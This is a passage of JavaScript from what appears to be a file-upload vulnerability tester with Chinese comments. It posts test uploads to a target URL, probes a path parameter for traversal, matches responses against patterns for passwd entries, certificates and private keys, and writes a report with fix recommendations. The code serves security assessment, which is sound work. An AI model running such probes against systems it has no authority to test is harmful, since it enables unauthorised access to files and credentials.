            const response = await fetch(this.targetUrl, {
                method: 'POST',
                body: formData
            });
            
            return {
                success: response.ok,
                status: response.status,
                response: await response.text(),
                technique: testCase.technique
            };
        } catch (error) {
            return {
                success: false,
                error: error.message,
                technique: testCase.technique
            };
        }
    }
    
    /**
     * 测试文件访问
     */
    async testFileAccess(path) {
        try {
            const url = `${this.targetUrl}?path=${encodeURIComponent(path)}`;
            const response = await fetch(url);
            
            const content = await response.text();
            const isSensitiveData = this.detectSensitiveData(content);
            
            return {
                success: response.ok && isSensitiveData,
                status: response.status,
                contentLength: content.length,
                hasSensitiveData: isSensitiveData
            };
        } catch (error) {
            return {
                success: false,
                error: error.message
            };
        }
    }
    
    /**
     * 检测敏感数据
     */
    detectSensitiveData(content) {
        const sensitivePatterns = [
            /root:x:0:0/,  // Linux passwd
            /localhost/,   // Windows hosts
            /bin/bash/,    // Shell
            /BEGIN CERTIFICATE/, // SSL证书
            /PRIVATE KEY/  // 私钥
        ];
        
        return sensitivePatterns.some(pattern => pattern.test(content));
    }
    
    /**
     * 生成测试报告
     */
    generateTestReport() {
        const vulnerable = this.testResults.filter(r => r.status === 'VULNERABLE').length;
        const protected = this.testResults.filter(r => r.status === 'PROTECTED').length;
        const total = this.testResults.length;
        
        return {
            summary: {
                total,
                vulnerable,
                protected,
                securityScore: ((protected / total) * 100).toFixed(2) + '%'
            },
            details: this.testResults,
            recommendations: this.generateRecommendations()
        };
    }
    
    /**
     * 生成修复建议
     */
    generateRecommendations() {
        const recommendations = [];
        
        const vulnerableTests = this.testResults.filter(r => r.status === 'VULNERABLE');
        
        if (vulnerableTests.some(t => t.test.includes('Extension bypass'))) {
            recommendations.push('实施严格的文件扩展名白名单验证');
        }
        
        if (vulnerableTests.some(t => t.test.includes('MIME spoofing'))) {
            recommendations.push('添加文件内容验证和魔数检查');
        }
        
        if (vulnerableTests.some(t => t.test.includes('Path traversal'))) {
            recommendations.push('实施安全的路径处理和输入验证');
        }
        
        if (vulnerableTests.some(t => t.test.includes('Malicious content'))) {
            recommendations.push('部署恶意内容检测和病毒扫描');
        }
        
        if (vulnerableTests.some(t => t.test.includes('size limit'))) {
            recommendations.push('设置合理的文件大小限制');
        }
        
        if (vulnerableTests.some(t => t.test.includes('Concurrent'))) {
            recommendations.push('实施上传频率限制和资源保护');
        }
        
        return recommendations;
    }
}